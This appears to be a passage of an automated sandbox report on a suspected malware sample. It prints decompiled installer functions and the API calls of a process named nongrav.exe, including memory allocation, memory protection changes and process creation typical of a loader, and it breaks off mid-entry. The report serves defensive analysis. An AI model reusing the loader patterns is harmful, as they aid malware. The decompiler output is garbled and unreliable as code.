Opcode Fuzzy Hash: 582974e86ae2fd03bab8e680a7d41178196d5c72059f7a305892923ba048c2f6
Instruction Fuzzy Hash: 2911C071A0010DABDB10EF64DD08AAE77AAFF48330F1081A4F962D7191DB349E11EB96

Uniqueness

Uniqueness Score: -1.00%

Function 00F37180, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00F37180(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v9;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _v44;
				signed int _t59;
				char _t64;
				signed int _t73;
				intOrPtr* _t74;
				void* _t75;
				intOrPtr* _t81;
				intOrPtr _t83;
				signed int _t89;
				void* _t90;
				intOrPtr _t91;
				signed int _t98;
				intOrPtr _t108;
				void* _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				void* _t113;
				intOrPtr* _t114;
				signed int _t115;
				void* _t117;
				void* _t118;
				void* _t125;

				_t59 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t59 ^ _t115;
				_push(__ebx);
				_push(__esi);
				_t112 = _a16;
				_push(__edi);
				_v9 = 0;
				_v20 = 1;
				_t89 =  *(_t112 + 8) ^  *_a4;
				_v24 = _t112 + 0x10;
				_v16 = _t89;
				E00F37130(_a8, _t89, _t112 + 0x10);
				_t108 = _a20;
				E00F377C1(_t108);
				_t64 = _a12;
				_t118 = _t117 + 0x10;
				if(( *(_t64 + 4) & 0x00000066) != 0) {
					__eflags =  *((intOrPtr*)(_t112 + 0xc)) - 0xfffffffe;
					if( *((intOrPtr*)(_t112 + 0xc)) != 0xfffffffe) {
						_t104 = 0xfffffffe;
						E00F37108(_t112, 0xfffffffe, _t112 + 0x10, _a4);
						goto L20;
					}
					goto L21;
				} else {
					_v36 = _t64;
					_v32 = _t108;
					_t110 =  *((intOrPtr*)(_t112 + 0xc));
					 *((intOrPtr*)(_t112 - 4)) =  &_v36;
					if(_t110 == 0xfffffffe) {
						L21:
						__eflags = _v8 ^ _t115;
						_pop(_t109);
						_pop(_t113);
						_pop(_t90);
						return E00F36C20(_v20, _t90, _v8 ^ _t115, _t104, _t109, _t113);
					} else {
						while(1) {
							_t73 = _t110 + (_t110 + 2) * 2;
							_t97 =  *((intOrPtr*)(_t89 + 4 + _t73 * 4));
							_t74 = _t89 + _t73 * 4;
							_t91 =  *_t74;
							_v28 = _t74;
							if( *((intOrPtr*)(_t89 + 4 + _t73 * 4)) == 0) {
								goto L12;
							}
							_t104 = _t112 + 0x10;
							_t75 = E00F370BE(_t97, _t112 + 0x10);
							_t98 = 1;
							_v9 = 1;
							_t125 = _t75;
							if(_t125 < 0) {
								_t89 = _v16;
								_v20 = 0;
								goto L20;
							} else {
								if(_t125 <= 0) {
									L13:
									_t110 = _t91;
									__eflags = _t91 - 0xfffffffe;
									if(_t91 == 0xfffffffe) {
										__eflags = _t98;
										if(_t98 != 0) {
											_t89 = _v16;
											L20:
											E00F37130(_a8, _t89, _v24);
										}
										goto L21;
									} else {
										_t89 = _v16;
										continue;
									}
								} else {
									_t76 = _a12;
									if( *_a12 == 0xe06d7363) {
										_t127 =  *0xf388f4;
										if( *0xf388f4 != 0) {
											_t76 = E00F374A0(_t127, 0xf388f4);
											_t118 = _t118 + 4;
											if(_t76 != 0) {
												_t114 =  *0xf388f4; // 0x0
												 *0xf3a290(_a12, 1);
												_t76 =  *_t114();
												_t112 = _a16;
												_t118 = _t118 + 8;
											}
										}
									}
									E00F370EE(_t76, _t112);
									if( *((intOrPtr*)(_t112 + 0xc)) != _t110) {
										E00F37108(_t112, _t110, _t112 + 0x10, _a4);
									}
									 *((intOrPtr*)(_t112 + 0xc)) = _t91;
									E00F37130(_a4, _v20, _t112 + 0x10);
									E00F370D5();
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t115);
									_t81 =  *_v44;
									if( *_t81 == 0xe06d7363 &&  *((intOrPtr*)(_t81 + 0x10)) == 3) {
										_t83 =  *((intOrPtr*)(_t81 + 0x14));
										if(_t83 == 0x19930520 || _t83 == 0x19930521 || _t83 == 0x19930522 || _t83 == 0x1994000) {
											__imp__?terminate@@YAXXZ();
										}
									}
									return 0;
								}
							}
							goto L31;
							L12:
							_t98 = _v9;
							goto L13;
						}
					}
				}
				L31:
			}

0x00f37188
0x00f3718f
0x00f37195
0x00f37196
0x00f37197
0x00f3719a
0x00f3719b
0x00f3719f
0x00f371ac
0x00f371b3
0x00f371b6
0x00f371b9
0x00f371be
0x00f371c2
0x00f371c7
0x00f371ca
0x00f371d1
0x00f3728e
0x00f37292
0x00f3729d
0x00f372a2
0x00000000
0x00f372a2
0x00000000
0x00f371d7
0x00f371d7
0x00f371dd
0x00f371e0
0x00f371e3
0x00f371e9
0x00f372b7
0x00f372bd
0x00f372bf
0x00f372c0
0x00f372c1
0x00f372ca
0x00000000
0x00f371f0
0x00f371f3
0x00f371f6
0x00f371fa
0x00f371fd
0x00f371ff
0x00f37204
0x00000000
0x00000000
0x00f37206
0x00f37209
0x00f3720e
0x00f37210
0x00f37213
0x00f37215
0x00f37279
0x00f3727c
0x00000000
0x00f37217
0x00f37217
0x00f3726a
0x00f3726a
0x00f3726c
0x00f3726f
0x00f37285
0x00f37287
0x00f37289
0x00f372a7
0x00f372af
0x00f372b4
0x00000000
0x00f37271
0x00f37271
0x00000000
0x00f37271
0x00f37219
0x00f37219
0x00f37222
0x00f37224
0x00f3722b
0x00f37232
0x00f37237
0x00f3723c
0x00f3723e
0x00f3724b
0x00f37251
0x00f37253
0x00f37256
0x00f37256
0x00f3723c
0x00f3722b
0x00f3725b
0x00f37263
0x00f372d6
0x00f372d6
0x00f372de
0x00f372e9
0x00f372f9
0x00f372fe
0x00f372ff
0x00f37300
0x00f37301
0x00f37302
0x00f37303
0x00f37304
0x00f37305
0x00f37306
0x00f37307
0x00f37308
0x00f37309
0x00f3730a
0x00f3730b
0x00f3730c
0x00f3730d
0x00f3730e
0x00f3730f
0x00f37312
0x00f37318
0x00f37320
0x00f37328
0x00f37330
0x00f37347
0x00f37347
0x00f37330
0x00f37350
0x00f37350
0x00f37217
0x00000000
0x00f37267
0x00f37267
0x00000000
0x00f37267
0x00f371f0
0x00f371e9
0x00000000

APIs

__IsNonwritableInCurrentImage.LIBCMT ref: 00F37232
?terminate@@YAXXZ.MSVCRT ref: 00F37347

Strings

csm, xrefs: 00F3731A
csm, xrefs: 00F3721C

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: ?terminate@@CurrentImageNonwritable
String ID: csm$csm
API String ID: 3343398186-3733052814
Opcode ID: d730178fca618bbc04ecc643f48f2c745ecb150852405f184d1f70b297068ff9
Instruction ID: 130dae47355d22c391797f9d12eae3c8ef943862b04bcab26b526e39b6f36a9d
Opcode Fuzzy Hash: d730178fca618bbc04ecc643f48f2c745ecb150852405f184d1f70b297068ff9
Instruction Fuzzy Hash: B651ACB19083099FCB24EFA9C8809AFBBB9AF44334F14845AE85597351D735EE01EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F36280, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00F36280(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00F3158C( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				E00F364E7( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0xf39a88 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0xf39a88 = 0x80070052;
					_t37 = 0;
				}
				return E00F36C20(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x00f3628b
0x00f36292
0x00f36298
0x00f362aa
0x00f362b3
0x00f362c1
0x00f362c2
0x00f362d0
0x00f362d5
0x00f362f3
0x00f362f8
0x00f36309
0x00f36323
0x00f3632d
0x00f36337
0x00f36337
0x00f3633a
0x00f362fa
0x00f362fa
0x00f36304
0x00f36304
0x00f36352

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F362ED
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F3631B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F3633A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F362AB

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-2312194364
Opcode ID: 607743d825a08e5779adf4108c2bbecd2cbe73460f0adcb9f471c2b8b3845651
Instruction ID: ca08d460d054427a18da4b2e5e846097c0efb0039bf4bcb14341df14c03f53ba
Opcode Fuzzy Hash: 607743d825a08e5779adf4108c2bbecd2cbe73460f0adcb9f471c2b8b3845651
Instruction Fuzzy Hash: BE21C3B1A0021CABDB24DF25DC85FEB776DEB84334F104169B945E3240DBB49D85AF60

Uniqueness

Uniqueness Score: -1.00%

Function 00F363E1, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00F363E1(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0xf39164; // 0xf30000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E00F34327(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x00f363e9
0x00f363f4
0x00f363fe
0x00f36435
0x00f36441
0x00f36446
0x00f36400
0x00f36408
0x00f3640c
0x00000000
0x00f3640e
0x00f36411
0x00f36416
0x00f36413
0x00f36413
0x00f36413
0x00f36428
0x00f3642a
0x00f36433
0x00000000
0x00000000
0x00f36433
0x00f3640c
0x00f36451

APIs

FindResourceA.KERNEL32(00F30000,000007D6,00000005), ref: 00F363F4
LoadResource.KERNEL32(00F30000,00000000,?,?,00F32D76,00000000,00F31800,00000547,0000083E,?,?,?,?,?,?,00000000), ref: 00F36402
DialogBoxIndirectParamA.USER32 ref: 00F36421
FreeResource.KERNEL32(00000000,?,?,00F32D76,00000000,00F31800,00000547,0000083E,?,?,?,?,?,?,00000000,00000001), ref: 00F3642A

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: a17f32cb8338e4150ca8ee18415968cb96df45f3ef0c0b50702d0ef5ea16bafd
Instruction ID: 68dc01050ef3dde79fd83f9f591ace05355d21dd006b1e2d21840841c3ba484c
Opcode Fuzzy Hash: a17f32cb8338e4150ca8ee18415968cb96df45f3ef0c0b50702d0ef5ea16bafd
Instruction Fuzzy Hash: E9012672900209BBCB115F69DC08DAB766EEB85370F008129FE20D3090DB70CC10B7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00F33514, Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F33514(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x00f33520
0x00f33523
0x00f33525
0x00f33533
0x00f3353b
0x00000000
0x00000000
0x00f3354e
0x00000000
0x00f33550
0x00f33550
0x00f33554
0x00f3355f
0x00f33556
0x00f33558
0x00f33558
0x00f3356e
0x00f33574
0x00f3357a
0x00000000
0x00000000
0x00f3357a
0x00000000
0x00f3354e
0x00f33581

APIs

MsgWaitForMultipleObjects.USER32 ref: 00F33533
PeekMessageA.USER32 ref: 00F33546
DispatchMessageA.USER32 ref: 00F3355F
PeekMessageA.USER32 ref: 00F3356E

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 7ff34d85f5189836acfcf12166d6139d93281879ec00c585e8e943b14e9c1ee6
Instruction ID: 215bdb3ec15e145aff8dac1ea22bb47c680050d72627ff921ffc7dd3ee8f9a96
Opcode Fuzzy Hash: 7ff34d85f5189836acfcf12166d6139d93281879ec00c585e8e943b14e9c1ee6
Instruction Fuzzy Hash: 0B016776D0011977DB309A9A5C08EEBBA7CDBC5B30F040119BE15E2080D664DA00EAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00F368C0, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F368C0() {
				signed int _t10;
				intOrPtr* _t13;
				intOrPtr* _t14;
				void* _t15;
				signed int _t18;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t25;

				_t25 =  *0xf30000 - 0x5a4d; // 0x5a4d
				if(_t25 == 0) {
					_t19 =  *0xf3003c; // 0xf0
					__eflags =  *((intOrPtr*)(_t19 + 0xf30000)) - 0x4550;
					if( *((intOrPtr*)(_t19 + 0xf30000)) != 0x4550) {
						goto L1;
					} else {
						_t2 = _t19 + 0xf30018; // 0xb010b
						_t18 =  *_t2 & 0x0000ffff;
						__eflags = _t18 - 0x10b;
						if(_t18 == 0x10b) {
							_t10 = 0;
							__eflags =  *((intOrPtr*)(_t19 + 0xf30074)) - 0xe;
							if( *((intOrPtr*)(_t19 + 0xf30074)) > 0xe) {
								__eflags =  *(_t19 + 0xf300e8);
								goto L9;
							}
						} else {
							__eflags = _t18 - 0x20b;
							if(_t18 != 0x20b) {
								goto L1;
							} else {
								_t10 = 0;
								__eflags =  *((intOrPtr*)(_t19 + 0xf30084)) - 0xe;
								if( *((intOrPtr*)(_t19 + 0xf30084)) > 0xe) {
									__eflags =  *(_t19 + 0xf300f8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t10 = _t10 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t10 = 0;
				}
				 *0xf38238 = _t10;
				__set_app_type(E00F373EE(2));
				 *0xf388e4 =  *0xf388e4 | 0xffffffff;
				 *0xf388e8 =  *0xf388e8 | 0xffffffff;
				_t13 = __p__fmode();
				_t22 =  *0xf38568; // 0x0
				 *_t13 = _t22;
				_t14 = __p__commode();
				_t23 =  *0xf3855c; // 0x0
				 *_t14 = _t23;
				_t15 = E00F37440();
				if( *0xf38010 == 0) {
					__setusermatherr(E00F37440);
				}
				E00F3764F(_t15);
				return 0;
			}

0x00f368c5
0x00f368cc
0x00f368d2
0x00f368d8
0x00f368e2
0x00000000
0x00f368e4
0x00f368e4
0x00f368e4
0x00f368eb
0x00f368f0
0x00f3690c
0x00f3690e
0x00f36915
0x00f36917
0x00000000
0x00f36917
0x00f368f2
0x00f368f2
0x00f368f7
0x00000000
0x00f368f9
0x00f368f9
0x00f368fb
0x00f36902
0x00f36904
0x00f3691d
0x00f3691d
0x00f3691d
0x00f3691d
0x00f3691d
0x00f36902
0x00f368f7
0x00f368f0
0x00f368ce
0x00f368ce
0x00f368ce
0x00f368ce
0x00f36922
0x00f3692d
0x00f36933
0x00f3693a
0x00f36943
0x00f36949
0x00f3694f
0x00f36951
0x00f36957
0x00f3695d
0x00f3695f
0x00f3696b
0x00f36972
0x00f36978
0x00f36979
0x00f36980

APIs

__set_app_type.MSVCRT ref: 00F3692D
__p__fmode.MSVCRT ref: 00F36943
__p__commode.MSVCRT ref: 00F36951
__setusermatherr.MSVCRT ref: 00F36972

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: __p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1063105408-0
Opcode ID: 4fb03ee83f2dcb8ca40059e9f564b2084e22bfa0a239b63e437e4950d9f11fb1
Instruction ID: d20b3d15305e308bae9112ebcea51fc21edd430c8f257b559c327f32d7624ff9
Opcode Fuzzy Hash: 4fb03ee83f2dcb8ca40059e9f564b2084e22bfa0a239b63e437e4950d9f11fb1
Instruction Fuzzy Hash: 821186B0905308DFD7689B30D85D7153762EB04375F24896AE451CA2E1DF7EC886FB11

Uniqueness

Uniqueness Score: -1.00%

Function 00F3654A, Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00F3654A(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x00f3654a
0x00f3654f
0x00f36551
0x00f36554
0x00f36556
0x00f36556
0x00f36558
0x00f36559
0x00f3656a
0x00f36573
0x00f3657a
0x00f3657e
0x00000000
0x00000000
0x00f36570
0x00f36585
0x00f36587
0x00f3659d
0x00f3659d
0x00f3659f
0x00f365a3
0x00f36572
0x00f36572
0x00000000
0x00f36572
0x00f365a6
0x00f365a9
0x00f365a9
0x00f36583
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000000,00000000,00F329B1), ref: 00F36564
CharPrevA.USER32(?,00000000), ref: 00F36574
CharPrevA.USER32(?,00000000), ref: 00F3658B
CharNextA.USER32(00000000), ref: 00F36597

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: da7168159d48205b39b925e580ff9565556385f7329d86dcfb4afd195095243f
Instruction ID: 03a39dfb8f8989532474c87f19a0a6a3fd830053b42f4bea0813feac589d7c88
Opcode Fuzzy Hash: da7168159d48205b39b925e580ff9565556385f7329d86dcfb4afd195095243f
Instruction Fuzzy Hash: ADF0F4B2805191BEE7331F298C8C9BBBF99CF8B375B1D427EE4D9C2005D2154C06A672

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: nongrav.exe PID: 6136 Parent PID: 4360 nongrav.exeCOMMON

Executed Functions

Function 02AA969B, Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1147COMMON

Download Yara Rule

Strings

>8dq, xrefs: 02AA96D0
U, xrefs: 02AA9B64
d!, xrefs: 02AA882B
Mz=., xrefs: 02AA9A55
L, xrefs: 02AA9A96
if, xrefs: 02AA81C9

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: >8dq$L$Mz=.$d!$if$U
API String ID: 1029625771-37203794
Opcode ID: 8bbeb6a532311ff897ed5da461e839853885a38ad5e47fb5448bdccd7dbf96f4
Instruction ID: 2af4a8e8b225df9b7034b7ad2ccc97a5b75796e0e0e49b404ba6146198555b2a
Opcode Fuzzy Hash: 8bbeb6a532311ff897ed5da461e839853885a38ad5e47fb5448bdccd7dbf96f4
Instruction Fuzzy Hash: 59924471A4034A9FDF349E78CEA47EA37B6BF55390F85412EDC899B244D7318A85CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02AAA67E, Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 862COMMON

Download Yara Rule

Strings

d!, xrefs: 02AA882B
if, xrefs: 02AA81C9

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: d!$if
API String ID: 0-935571250
Opcode ID: 89203b47bcd4ed68432089db74aeb77f7c7d346d96ed27cf3cad5c50992c308f
Instruction ID: 159e2de8b92c466ff75db14fa53f67cd4f58cc5e0948cf7fe23253cb48e31fdb
Opcode Fuzzy Hash: 89203b47bcd4ed68432089db74aeb77f7c7d346d96ed27cf3cad5c50992c308f
Instruction Fuzzy Hash: 63625771A4034A9FDF349E78CEA47DB37B2AF65790F85412EDC899B244D7318986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02AAD227, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 248processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 02AAD53E

Strings

^~R, xrefs: 02AAD26B

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID: ^~R
API String ID: 2186235152-2040817260
Opcode ID: 9c3a79af555158877e7f89a52fe1a717c2ee80cb38782140e9fc4ce70ee80aef
Instruction ID: ad77344dec111ab116e9b14dae81378af1ab59d3bd13aa040215fa859dd87176
Opcode Fuzzy Hash: 9c3a79af555158877e7f89a52fe1a717c2ee80cb38782140e9fc4ce70ee80aef
Instruction Fuzzy Hash: 9191F7B1A0074A8FDF389E38CAB47DA3763BF56360F95421ECC8A8B654C7358A45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02AA8F8B, Relevance: 3.1, APIs: 2, Instructions: 131filelibraryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,4CD2DC12,0B26EC40,0F2F3112,-00000001230DFA73,6D128917), ref: 02AA9134
LoadLibraryA.KERNELBASE(?,00007DEE,?,868416F6,188EDDD0,02AA0225,-31ECBAA2,02AAA4EB,00000000,02AA01BE), ref: 02AAAC24

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID: CreateFileLibraryLoad
String ID:
API String ID: 2049390123-0
Opcode ID: a25521c7871bb581af64c549cd6690df89255d743bf3385c05a8a9936935a7e3
Instruction ID: 838c2a5c6de3d8be4a20fe7c890a1260d92524b7dcc3dc2472cfc44d9e6f31f2
Opcode Fuzzy Hash: a25521c7871bb581af64c549cd6690df89255d743bf3385c05a8a9936935a7e3
Instruction Fuzzy Hash: 90417972A40356CFDF309EA48ED67DB77A6AF29390F85412E8C889B206D3304985CB51

Uniqueness

Uniqueness Score: -1.00%

Function 004015E0, Relevance: 2.3, APIs: 1, Instructions: 764
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			_entry_() {
				signed char _t255;
				intOrPtr* _t256;
				void* _t381;

				_push(0x401cac); // executed
				L004015D8(); // executed
				 *_t255 =  *_t255 + _t255;
				 *_t255 =  *_t255 + _t255;
				 *_t255 =  *_t255 + _t255;
				 *_t255 =  *_t255 ^ _t255;
				 *_t255 =  *_t255 + _t255;
				_t256 = _t255 + 1;
				 *_t256 =  *_t256 + _t256;
				 *_t256 =  *_t256 + _t256;
				 *_t256 =  *_t256 + _t256;
				 *((intOrPtr*)(_t381 + 0x14)) =  *((intOrPtr*)(_t381 + 0x14)) + _t381;
				asm("adc al, 0x23");
				asm("repe js 0x45");
			}

0x004015e0
0x004015e5
0x004015ea
0x004015ec
0x004015ee
0x004015f0
0x004015f2
0x004015f4
0x004015f5
0x004015f7
0x004015f9
0x004015fb
0x004015fd
0x004015ff

APIs

#100.MSVBVM60(00401CAC), ref: 004015E5

Memory Dump Source

Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID:
API String ID: 1341478452-0
Opcode ID: f8d9d808b45ca36b6c9d886c0330c3aaafa30e87b7b161fba1fc9e67c5fedafb
Instruction ID: 9897fe17b0eac189ff8b9ba8442e18036010c6a86b5813d9e986ccab0728a44b
Opcode Fuzzy Hash: f8d9d808b45ca36b6c9d886c0330c3aaafa30e87b7b161fba1fc9e67c5fedafb
Instruction Fuzzy Hash: ED428A7244E3C19FD7138B749DA51A27FB0AE1331431E06DBD4C18F1B3E2286A5AD766

Uniqueness

Uniqueness Score: -1.00%

Function 02AA9248, Relevance: 1.7, APIs: 1, Instructions: 170memorylibrarynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(74B904DF), ref: 02AA9451
LoadLibraryA.KERNELBASE(?,00007DEE,?,868416F6,188EDDD0,02AA0225,-31ECBAA2,02AAA4EB,00000000,02AA01BE), ref: 02AAAC24

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 0ac3e1980febde36e88948c3cd3437fb2c3e03d8d526c1bde599b06b7247556d
Instruction ID: 6c2e5bc07de766052b2db00abf4dfeb2cf6650e1aa2c8536b9b58a6a3d1893c2
Opcode Fuzzy Hash: 0ac3e1980febde36e88948c3cd3437fb2c3e03d8d526c1bde599b06b7247556d
Instruction Fuzzy Hash: 9951287564034BDBDF349E649CE47EB33A7AF6A394F95012DCC8A5B250DB314946CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02AACBBD, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 02AACC6E

Memory Dump Source

